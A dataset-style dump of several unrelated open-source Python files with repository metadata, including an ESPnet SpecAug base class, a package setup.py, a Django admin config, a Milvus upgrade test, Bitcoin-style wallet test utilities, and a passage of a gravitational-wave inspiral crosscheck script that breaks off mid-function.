] | 3,666 | 2017-12-14T05:58:50.000Z | 2022-03-31T22:11:49.000Z | espnet2/asr/specaug/abs_specaug.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 1,709 | 2017-12-13T01:02:42.000Z | 2022-03-31T11:57:45.000Z | from typing import Optional
from typing import Tuple
import torch
class AbsSpecAug(torch.nn.Module):
"""Abstract class for the augmentation of spectrogram
The process-flow:
Frontend -> SpecAug -> Normalization -> Encoder -> Decoder
"""
def forward(
self, x: torch.Tensor, x_lengths: torch.Tensor = None
) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
raise NotImplementedError
| 22.421053 | 63 | 0.687793 |
d94a6e8dec73e26c18f7902bd83b61bf0417745e | 1,532 | py | Python | setup.py | CIRAIG/bw2waterbalancer | aaeace9f71fe55cb17488d020467f471b32be3d8 | [
"MIT"
] | 1 | 2021-01-27T22:16:56.000Z | 2021-01-27T22:16:56.000Z | setup.py | CIRAIG/bw2waterbalancer | aaeace9f71fe55cb17488d020467f471b32be3d8 | [
"MIT"
] | null | null | null | setup.py | CIRAIG/bw2waterbalancer | aaeace9f71fe55cb17488d020467f471b32be3d8 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
import os
packages = []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
f = open('README.md')
readme = f.read()
f.close()
setup(
name='bw2waterbalancer',
version="0.1.1",
packages=find_packages(),
package_data={'bw2waterbalancer': ['data/*.json']},
author="Pascal Lesage",
author_email="pascal.lesage@polymtl.ca",
license="MIT; LICENSE.txt",
install_requires=[
'brightway2',
'numpy',
'pyprind',
'presamples',
],
url="https://gitlab.com/pascal.lesage/bw2waterbalance",
long_description=readme,
long_description_content_type="text/markdown",
description='Package used to create balanced LCA water exchange samples to override unbalanced sample in Brightway2.',
classifiers=[
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
],
)
| 31.916667 | 122 | 0.635117 |
1131e3f830067838563bd78f08acb9e4c1989ad3 | 1,462 | py | Python | app/core/admin.py | gaylonalfano/recipe-app-api | 3227a7c9dec901f5378b57c89c1d26c4a7b505b2 | [
"MIT"
] | null | null | null | app/core/admin.py | gaylonalfano/recipe-app-api | 3227a7c9dec901f5378b57c89c1d26c4a7b505b2 | [
"MIT"
] | null | null | null | app/core/admin.py | gaylonalfano/recipe-app-api | 3227a7c9dec901f5378b57c89c1d26c4a7b505b2 | [
"MIT"
] | null | null | null | # core/admin.py
from django.contrib import admin
# Import default user admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# Import gettext for supporting multiple languages using translation engine
from django.utils.translation import gettext as _
# Import our models
from core import models
# Now create our custom user admin
class UserAdmin(BaseUserAdmin):
# change the ordering we will set to the id of the object
ordering = ['id']
# Going to list them by email and name and order by id
list_display = ['email', 'name']
# Customize our user admin fieldsets. Reference Notion notes!
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('name',)}),
(
_('Permissions'),
{'fields': ('is_active', 'is_staff', 'is_superuser')}
),
(_('Important Dates'), {'fields': ('last_login',)})
)
# Configure add_fieldsets var to define fields in /add page
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')
}),
)
# Register our UserAdmin class to our User model
admin.site.register(models.User, UserAdmin)
# Register our Tag model
admin.site.register(models.Tag)
# Register our Ingredient model
admin.site.register(models.Ingredient)
# Register our Recipe model (just created migrations file)
admin.site.register(models.Recipe)
| 33.227273 | 75 | 0.664843 |
14678fba7c84281c75024e17ee0ffd7e3ddced56 | 1,484 | py | Python | tests/python_client/deploy/scripts/action_after_upgrade.py | suibianmzl/milvus | 0afd63378b92674d0d93f570968536b343e83186 | [
"Apache-2.0"
] | 1 | 2022-01-31T13:51:31.000Z | 2022-01-31T13:51:31.000Z | tests/python_client/deploy/scripts/action_after_upgrade.py | suibianmzl/milvus | 0afd63378b92674d0d93f570968536b343e83186 | [
"Apache-2.0"
] | 38 | 2021-11-22T11:15:27.000Z | 2022-03-30T08:14:12.000Z | tests/python_client/deploy/scripts/action_after_upgrade.py | suibianmzl/milvus | 0afd63378b92674d0d93f570968536b343e83186 | [
"Apache-2.0"
] | 3 | 2021-11-17T09:21:42.000Z | 2021-11-22T11:54:09.000Z | from pymilvus import connections
from utils import *
def task_1(data_size, host):
"""
task_1:
before upgrade: create collection and insert data, load and search
after upgrade: get collection, load, search, create index, load, and search
"""
prefix = "task_1_"
connections.connect(host=host, port=19530, timeout=60)
get_collections(prefix)
load_and_search(prefix)
create_collections_and_insert_data(prefix, data_size)
create_index(prefix)
load_and_search(prefix)
def task_2(data_size, host):
"""
task_2:
before upgrade: create collection, insert data and create index, load and search
after upgrade: get collection, load, search, insert data, create index, load, and search
"""
prefix = "task_2_"
connections.connect(host=host, port=19530, timeout=60)
get_collections(prefix)
load_and_search(prefix)
create_collections_and_insert_data(prefix, data_size)
create_index(prefix)
load_and_search(prefix)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='config for deploy test')
parser.add_argument('--host', type=str, default="127.0.0.1", help='milvus server ip')
parser.add_argument('--data_size', type=int, default=3000, help='data size')
args = parser.parse_args()
data_size = args.data_size
host = args.host
print(f"data size: {data_size}")
task_1(data_size, host)
task_2(data_size, host) | 32.977778 | 96 | 0.704178 |
587a9ac5b170a32a3dbab8d7fedc0ba02c2f27ab | 4,957 | py | Python | test/functional/test_framework/wallet_util.py | Stackout/pexa-backport | db503f06746a8b199e56c6c918e76eca4d150f7f | [
"MIT"
] | null | null | null | test/functional/test_framework/wallet_util.py | Stackout/pexa-backport | db503f06746a8b199e56c6c918e76eca4d150f7f | [
"MIT"
] | null | null | null | test/functional/test_framework/wallet_util.py | Stackout/pexa-backport | db503f06746a8b199e56c6c918e76eca4d150f7f | [
"MIT"
] | 1 | 2020-05-30T02:27:15.000Z | 2020-05-30T02:27:15.000Z | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Pexa Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Useful util functions for testing the wallet"""
from collections import namedtuple
from test_framework.address import (
key_to_p2pkh,
key_to_p2sh_p2wpkh,
key_to_p2wpkh,
script_to_p2sh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from test_framework.key import (
bytes_to_wif,
ECKey,
)
from test_framework.script import (
CScript,
OP_0,
OP_2,
OP_3,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DUP,
OP_EQUAL,
OP_EQUALVERIFY,
OP_HASH160,
hash160,
sha256,
)
from test_framework.util import hex_str_to_bytes
Key = namedtuple('Key', ['privkey',
'pubkey',
'p2pkh_script',
'p2pkh_addr',
'p2wpkh_script',
'p2wpkh_addr',
'p2sh_p2wpkh_script',
'p2sh_p2wpkh_redeem_script',
'p2sh_p2wpkh_addr'])
Multisig = namedtuple('Multisig', ['privkeys',
'pubkeys',
'p2sh_script',
'p2sh_addr',
'redeem_script',
'p2wsh_script',
'p2wsh_addr',
'p2sh_p2wsh_script',
'p2sh_p2wsh_addr'])
def get_key(node):
"""Generate a fresh key on node
Returns a named tuple of privkey, pubkey and all address and scripts."""
addr = node.getnewaddress()
pubkey = node.getaddressinfo(addr)['pubkey']
pkh = hash160(hex_str_to_bytes(pubkey))
return Key(privkey=node.dumpprivkey(addr),
pubkey=pubkey,
p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(),
p2pkh_addr=key_to_p2pkh(pubkey),
p2wpkh_script=CScript([OP_0, pkh]).hex(),
p2wpkh_addr=key_to_p2wpkh(pubkey),
p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(),
p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(),
p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey))
def get_generate_key():
"""Generate a fresh key
Returns a named tuple of privkey, pubkey and all address and scripts."""
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
pubkey = eckey.get_pubkey().get_bytes().hex()
pkh = hash160(hex_str_to_bytes(pubkey))
return Key(privkey=privkey,
pubkey=pubkey,
p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(),
p2pkh_addr=key_to_p2pkh(pubkey),
p2wpkh_script=CScript([OP_0, pkh]).hex(),
p2wpkh_addr=key_to_p2wpkh(pubkey),
p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(),
p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(),
p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey))
def get_multisig(node):
"""Generate a fresh 2-of-3 multisig on node
Returns a named tuple of privkeys, pubkeys and all address and scripts."""
addrs = []
pubkeys = []
for _ in range(3):
addr = node.getaddressinfo(node.getnewaddress())
addrs.append(addr['address'])
pubkeys.append(addr['pubkey'])
script_code = CScript([OP_2] + [hex_str_to_bytes(pubkey) for pubkey in pubkeys] + [OP_3, OP_CHECKMULTISIG])
witness_script = CScript([OP_0, sha256(script_code)])
return Multisig(privkeys=[node.dumpprivkey(addr) for addr in addrs],
pubkeys=pubkeys,
p2sh_script=CScript([OP_HASH160, hash160(script_code), OP_EQUAL]).hex(),
p2sh_addr=script_to_p2sh(script_code),
redeem_script=script_code.hex(),
p2wsh_script=witness_script.hex(),
p2wsh_addr=script_to_p2wsh(script_code),
p2sh_p2wsh_script=CScript([OP_HASH160, witness_script, OP_EQUAL]).hex(),
p2sh_p2wsh_addr=script_to_p2sh_p2wsh(script_code))
def test_address(node, address, **kwargs):
"""Get address info for `address` and test whether the returned values are as expected."""
addr_info = node.getaddressinfo(address)
for key, value in kwargs.items():
if value is None:
if key in addr_info.keys():
raise AssertionError("key {} unexpectedly returned in getaddressinfo.".format(key))
elif addr_info[key] != value:
raise AssertionError("key {} value {} did not match expected value {}".format(key, addr_info[key], value))
| 40.300813 | 118 | 0.598749 |
db31b90359641493ef788c292665f0f9203dee36 | 4,877 | py | Python | tweet_motion_jpg.py | syncom/twitimg | cbc8163b97f86c1828fc1007e73e3eff583d5b65 | [
"Apache-2.0"
] | 1 | 2020-07-12T17:26:16.000Z | 2020-07-12T17:26:16.000Z | tweet_motion_jpg.py | syncom/twitimg-rpi | cbc8163b97f86c1828fc1007e73e3eff583d5b65 | [
"Apache-2.0"
] | null | null | null | tweet_motion_jpg.py | syncom/twitimg-rpi | cbc8163b97f86c1828fc1007e73e3eff583d5b65 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Tweet motion-detected JPEG image.
This module captures and tweets a motion-detected JPEG image from a Raspberry
Pi with a camera module. The image capture part is credited to the excellent
post https://www.raspberrypi.org/forums/viewtopic.php?t=45235, by brainflakes.
Read brainflakes' original post for the algorithm. I have removed the force
capture part for this script.
"""
import StringIO
import subprocess
import os
import time
import argparse
from datetime import datetime
from PIL import Image
import importlib
from twython import Twython
# Motion detection settings:
# - threshold: how much a pixel has to change by to be marked as "changed"
# - sensitivity: how many changed pixels before capturing an image
threshold = 10
sensitivity = 800
test_width = 100
test_height = 75
# File settings
save_width = 1280
save_height = 960
reserve_diskspace = 40 * 1024 * 1024 # Keep 40 mb free on disk
# Capture a small bitmap test image, for motion detection
def captureTestImage():
command = "raspistill -n -w %s -h %s -t 1000 -e bmp -o -" % (test_width,
test_height)
output = None
image_data = StringIO.StringIO()
try:
output = subprocess.check_output(command, shell=True)
except subprocess.CalledProcessError:
print "Command exited with non-zero code. No output."
return None, None
if output:
image_data.write(output)
image_data.seek(0)
im = Image.open(image_data)
buffer = im.load()
image_data.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, dirname, diskSpaceToReserve):
keepDiskSpaceFree(dirname, diskSpaceToReserve)
time = datetime.now()
filename = "motion-%04d%02d%02d-%02d%02d%02d.jpg" % (time.year, time.month, time.day, time.hour, time.minute, time.second)
command = "raspistill -n -w %s -h %s -t 10 -e jpg -q 15 -o %s/%s" % (width, height, dirname.rstrip('/'), filename)
try:
subprocess.call(command, shell=True)
except subprocess.CalledProcessError:
print "Command exited with non-zero code. No file captured."
return None
print "Captured %s/%s" % (dirname.rstrip('/'), filename)
return dirname.rstrip('/') + '/' + filename
# Keep free space above given level
def keepDiskSpaceFree(dirname, bytesToReserve):
if (getFreeSpace(dirname) < bytesToReserve):
for filename in sorted(os.listdir(dirname)):
if filename.startswith("motion") and filename.endswith(".jpg"):
os.remove(dirname.rstrip('/') +"/" + filename)
print "Deleted %s/%s to avoid filling disk" % ( dirname.rstrip('/'), filename )
if (getFreeSpace(dirname) > bytesToReserve):
return
return
# Get available disk space
def getFreeSpace(dir):
st = os.statvfs(dir)
du = st.f_bavail * st.f_frsize
return du
# Where work happens
def do_tweet_motion(dirname):
mod = importlib.import_module("tweet_image")
# Get first image
captured1 = False
while (not captured1):
image1, buffer1 = captureTestImage()
if image1:
captured1 = True
while (True):
# Time granule for wait in the case of error/exception
basic_wait = 300
# Double multiplicity when error/exception happens
mult = 1
# Get comparison image
captured2 = False
while (not captured2):
image2, buffer2 = captureTestImage()
if image2:
captured2 = True
# Count changed pixels
changedPixels = 0
for x in xrange(0, test_width):
for y in xrange(0, test_height):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Save an image if pixels changed
if changedPixels > sensitivity:
fpath = saveImage(save_width, save_height, dirname, reserve_diskspace)
# Tweet saved image
if fpath:
try:
mod.do_tweet(fpath)
mult = 1
except Exception as e:
print "Tweet failed. Encountered exception, as follows: "
print(e)
sleeptime = mult * basic_wait
time.sleep(sleeptime) # Wait some time
print("Retry after {0} seconds".format(sleeptime))
mult = mult * 2
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("dir_path")
args = parser.parse_args()
do_tweet_motion(args.dir_path)
| 33.176871 | 126 | 0.62764 |
c088a33edc880ce4aa89e86bc61efab784996be5 | 3,479 | py | Python | models/yolov3/conversion/reconstruct_conv_layer.py | martinGalajdaSchool/object-detection | 2c72b643464a89b91daac520a862ebaad2b3f9f0 | [
"Apache-2.0"
] | 2 | 2019-12-11T05:50:39.000Z | 2021-12-06T12:28:40.000Z | models/yolov3/conversion/reconstruct_conv_layer.py | martinGalajdaSchool/object-detection | 2c72b643464a89b91daac520a862ebaad2b3f9f0 | [
"Apache-2.0"
] | 19 | 2019-12-16T21:23:00.000Z | 2022-03-02T14:59:12.000Z | models/yolov3/conversion/reconstruct_conv_layer.py | martin-galajda/object-detection | 2c72b643464a89b91daac520a862ebaad2b3f9f0 | [
"Apache-2.0"
] | null | null | null | from typing import Dict, Any
from keras import backend as K
import keras
import numpy as np
from keras.layers import (
Conv2D,
ZeroPadding2D,
)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l2
from models.yolov3.conversion.constants import YoloV3Activations
def parse_conv_layer(
*,
prev_layer: keras.layers.Layer,
layer_config: Dict[str, Any],
weight_decay: float,
weights_file: Any
):
weight_read = 0
filters = int(layer_config['filters'])
size = int(layer_config['size'])
stride = int(layer_config['stride'])
pad = int(layer_config['pad'])
activation = layer_config['activation']
batch_normalize = 'batch_normalize' in layer_config
# padding = 'same' is equivalent to pad = 1 in Darknet
padding = 'same' if pad == 1 and stride == 1 else 'valid'
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
prev_layer_shape = K.int_shape(prev_layer)
# This assumes channel last dimension ordering.
weights_shape = (size, size, prev_layer_shape[-1], filters)
darknet_w_shape = (filters, weights_shape[2], size, size)
weights_size = np.product(weights_shape)
print('with batch normalization' if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters,),
dtype='float32',
buffer=weights_file.read(filters * 4))
weight_read += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype='float32',
buffer=weights_file.read(filters * 12))
weight_read += 3 * filters
bn_weight_list = [
bn_weights[0], # <-- scale gamma
conv_bias, # <-- shift beta
bn_weights[1], # <-- running mean
bn_weights[2] # <-- running var
]
conv_weights = np.ndarray(
shape=darknet_w_shape,
dtype='float32',
buffer=weights_file.read(weights_size * 4))
weight_read += weights_size
# DarkNet conv_weights are serialized Caffe-style: (output_dim, input_dim, height, width)
# We need to set them into Tensorflow order: (height, width, input_dim, output_dim)
height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos = 2, 3, 1, 0
conv_weights = np.transpose(conv_weights, [height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos])
conv_weights = [conv_weights] if batch_normalize else [
conv_weights,
conv_bias
]
if stride > 1:
# Darknet uses left and top padding instead of 'same' mode
prev_layer = ZeroPadding2D(((1, 0), (1, 0)))(prev_layer)
# Create Conv2D layer
conv_layer = (Conv2D(
filters,
(size, size),
strides=(stride, stride),
kernel_regularizer=l2(weight_decay),
use_bias=not batch_normalize,
weights=conv_weights,
activation=None,
padding=padding))(prev_layer)
if batch_normalize:
conv_layer = (BatchNormalization(weights=bn_weight_list))(conv_layer)
if activation == YoloV3Activations.LINEAR:
return conv_layer, weight_read
if activation == YoloV3Activations.LEAKY:
conv_layer = LeakyReLU(alpha=0.1)(conv_layer)
return conv_layer, weight_read
raise ValueError(f'Unknown activation function `{activation}`.')
| 31.917431 | 109 | 0.668295 |
db0a415f964ef500015b723dc104a1b9c790c06d | 10,256 | py | Python | tests/crosschecks1711.09706.py | Lukas-Hoelker/SIDM-GWs | 6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69 | [
"MIT"
] | 1 | 2021-11-09T14:05:48.000Z | 2021-11-09T14:05:48.000Z | tests/crosschecks1711.09706.py | Lukas-Hoelker/SIDM-GWs | 6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69 | [
"MIT"
] | null | null | null | tests/crosschecks1711.09706.py | Lukas-Hoelker/SIDM-GWs | 6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69 | [
"MIT"
] | 1 | 2022-02-03T01:52:41.000Z | 2022-02-03T01:52:41.000Z | import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import UnivariateSpline, interp1d
from scipy.integrate import quad
import collections
from imripy import halo
from imripy import merger_system as ms
from imripy import inspiral
from imripy import waveform
inspiral.Classic.ln_Lambda=3.
def Meff(sp, r):
return np.where(r > sp.r_isco(), sp.m1 - 4.*np.pi*sp.halo.rho_spike*sp.halo.r_spike**3 *sp.r_isco()**(3.-sp.halo.alpha) /(3.-sp.halo.alpha), sp.m1)
def F(sp, r):
return np.where(r > sp.r_isco(), 4.*np.pi * sp.halo.rho_spike*sp.halo.r_spike**sp.halo.alpha /(3.-sp.halo.alpha), 0.)
def coeffs(sp):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
m2 = sp.m2
if isinstance(m2, (np.ndarray, collections.Sequence)):
m2 = m2[-1]
c_gw = 256./5.* m2 * Meff(sp, 2.*sp.r_isco())**2 * eps**(4./(3.-alpha))
c_df = 8.*np.pi*m2 *sp.halo.rho_spike *sp.halo.r_spike**alpha * 3. \
* Meff(sp, 2.*sp.r_isco())**(-3./2.)* eps**((2.*alpha-3.)/(6.-2.*alpha))
ctild = c_df/c_gw
return c_gw, c_df, ctild
def b_A(sp, x, alpha):
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
r = x/eps**(1./(3.-alpha))
omega_s = np.sqrt(Meff(sp, r)/r**3 + F(sp, r)/r**(sp.halo.alpha))
return 4. * r**2 * omega_s**2 / inspiral.Classic.ln_Lambda * (1. + r**2 * omega_s**2)
def f_gw(x, alpha):
return (1.+x**(3.-alpha))**3 / ( 4.*x**3 * ( 1.+ (4.-alpha) *x**(3.-alpha) ) )
def f_df(x, alpha):
return 1. / ( (1.+x**(3.-alpha))**(1./2.) * ( 1.+ (4.-alpha) *x**(3.-alpha) )* x**(-5./2.+alpha) )
def plotDiffEq(sp, r0, r1):
r = np.geomspace(r0, r1, num=100)
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
x = eps**(1./(3.-alpha))*r
c_gw, c_df, ctild = coeffs(sp)
print(c_gw*ms.year_to_pc, c_df*ms.year_to_pc)
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_gw_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{gw}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_gw*f_gw(x, alpha) , label='$c_{gw}f_{gw}$', color=l.get_c(), linestyle='--')
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_df_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{df}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha), label='$c_{df}f_{df}$' , color=l.get_c(), linestyle='--')
l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_acc_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{acc}/dt / dE_{orbit}/dR$', alpha=0.5)
plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha)*b_A(sp, x, alpha), label='$c_{df}f_{df}b_A$' , color=l.get_c(), linestyle='--')
plt.xlabel('$r/r_{ISCO}$')
def J(x, alpha):
return 4. * x**(11./2. - alpha) / (1. + x**(3.-alpha))**(7./2.)
def K(x, alpha):
return (1.+x**(3.-alpha))**(5./2.) * (1. + alpha/3.*x**(3.-alpha)) / (1. + (4.-alpha)*x**(3-alpha) )
def plotPhiprimeprime(sp, r0, r1):
r = np.geomspace(r0, r1, num=100)
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
x = eps**(1./(3.-alpha))*r
c_gw, c_df, ctild = coeffs(sp)
plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco())**(1./2.) * eps**(3./2./(3.-alpha)) \
* c_gw*(1.+ctild*J(x, alpha)*(1.+b_A(sp, x, alpha))) *3./4.* K(x,alpha) * x**(-11./2.), label=r'$\ddot{\Phi}^{paper}$' )
#plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco)**(1./2.) * eps**(3./2./(3.-alpha)) \
# * (c_gw*f_gw(x, alpha) + c_df*f_df(x, alpha)) * (3. + alpha*x**(3.-alpha))/(x**(5./2.) * (1.+ x**(3.-alpha))**(1./2.) ), label=r'$\ddot{\Phi}^{paper,ref}$' )
plt.loglog(r/sp.r_isco(), (sp.mass(r)/r**3 )**(-1./2.) * (-3.*sp.mass(r)/r**4 + 4.*np.pi *sp.halo.density(r)/r )* inspiral.Classic.da_dt(sp, r), label=r'$\ddot{\Phi}^{code}$')
plt.xlabel(r'$r/r_{ISCO}$')
def L(sp, f):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
c_gw, c_df, ctild = coeffs(sp)
c_eps = Meff(sp, 2.*sp.r_isco())**(11./6.-1./3.*alpha) * ctild * eps**((11.-2.*alpha)/(6.-2.*alpha))
b_eps = (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.) / inspiral.Classic.ln_Lambda * (1. + (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.))
deltatild = (1./np.pi**2 / f**2)**(1.-alpha/3.)
return 1. + 4.*c_eps*deltatild**((11.-2.*alpha)/(6.-2.*alpha)) * (1. + b_eps)
def phaseIntegrand(sp, f):
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
delta = (Meff(sp, 2.*sp.r_isco())/ np.pi**2 / f**2)**((3.-alpha)/3.)
chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2
x = (delta*eps)**(1./(3.-alpha)) *chi
c_gw, c_df, ctild = coeffs(sp)
return chi**(11./2.) / f**(8./3.) / K(x, alpha) / (1. + ctild*J(x,alpha)*(1. + b_A(sp, x, alpha)))
def plotPhase(sp, t, R, omega_s):
#f = np.geomspace(omega_s[1], omega_s[-2], num=200)/np.pi
#f_isco = f[-1]
f_gw = omega_s/np.pi
f_isco = f_gw[-1]
t_c = t[-1] + 5./256. * R[-1]**4/sp.m_total()**2 / sp.m_reduced()
if isinstance(t_c, (np.ndarray, collections.Sequence)):
t_c = t_c[-1]
PhiTild0 = - 3./4. * (8.*np.pi*sp.m_chirp()*f_gw)**(-5./3.) + 3./4.*(8.*np.pi*sp.m_chirp()*f_isco)**(-5./3.)
#plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild0, label=r'$\tilde{\Phi}_0^{analytic}$')
t_of_f = interp1d(omega_s/np.pi, t, kind='cubic', bounds_error=True)
#omega_gw = UnivariateSpline(t, 2*omega_s, ext=1, k=5 )
omega_gw = interp1d(t, 2*omega_s, kind='cubic', bounds_error=False, fill_value='extrapolate' )
#Phit = np.array([quad(lambda u: np.exp(u)*omega_gw(np.exp(u)), np.log(t[0]), np.log(y0))[0] for y0 in t ])
Phit = np.cumsum([quad(lambda t: omega_gw(t), t[i-1], t[i], limit=500, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(t)) ])
#Phi = interp1d(t, Phit - Phit[-1], kind='cubic', bounds_error=False, fill_value='extrapolate')(t_of_f(f_gw))
Phi = Phit - Phit[-1]
tpt = 2.*np.pi*f_gw * (t - t[-1])
PhiTild = tpt - Phi
DeltaPhi = PhiTild - PhiTild0
plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{code}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{code}$')
#integrand = UnivariateSpline(np.log(f), f* f**(-8./3.)/L(sp, f), k=5)
#integrand = UnivariateSpline(np.log(f), f* phaseIntegrand(sp, f), k=5)
#Phi = integrand.antiderivative()
#Phi = np.array([quad(lambda f: np.exp(-5./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ])
Phi = np.cumsum([quad(lambda f: f**(-8./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(f_gw)) ])
Phi = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * (Phi - Phi[-1])
#integrand2 = UnivariateSpline(np.log(f), f * f**(-11./3.)/L(sp, f), k=5)
#integrand2 = UnivariateSpline(np.log(f), phaseIntegrand(sp, f), k=5)
#tpt = integrand2.antiderivative()
#tpt = np.array([quad(lambda f: np.exp(-8./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ])
tpt = np.cumsum([quad(lambda f: f**(-11./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i==0 else 0. for i in range(len(f_gw)) ])
tpt = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * f_gw * ( tpt - tpt[-1])
PhiTild = tpt - Phi
DeltaPhi = PhiTild - PhiTild0
plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{paper}$')
plt.xlabel('f')
plt.xscale('log')
plt.yscale('symlog')
def plotWaveform(sp, t, R, omega_s):
#f = np.geomspace(omega_s[1], omega_s[-2], num=500)/np.pi
f_gw, h, _, Psi = waveform.h_2( sp, t, omega_s, R)
plt.loglog(f_gw*ms.year_to_pc*3.17e-8, h, label=r'$\tilde{h}^{code}$')
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
A = (5./24.)**(1./2.) * np.pi**(-2./3.) /sp.D * sp.m_chirp()**(5./6.)
plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * (L(sp,f_gw))**(-1./2.), label=r'$\tilde{h}^{paper,approx}$')
delta = (Meff(sp, 2.*sp.r_isco())/np.pi**2 / f_gw**2)**(1.-alpha/3.)
chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2
x = (delta*eps)**(1./(3.-alpha)) *chi
c_gw, c_df, ctild = coeffs(sp)
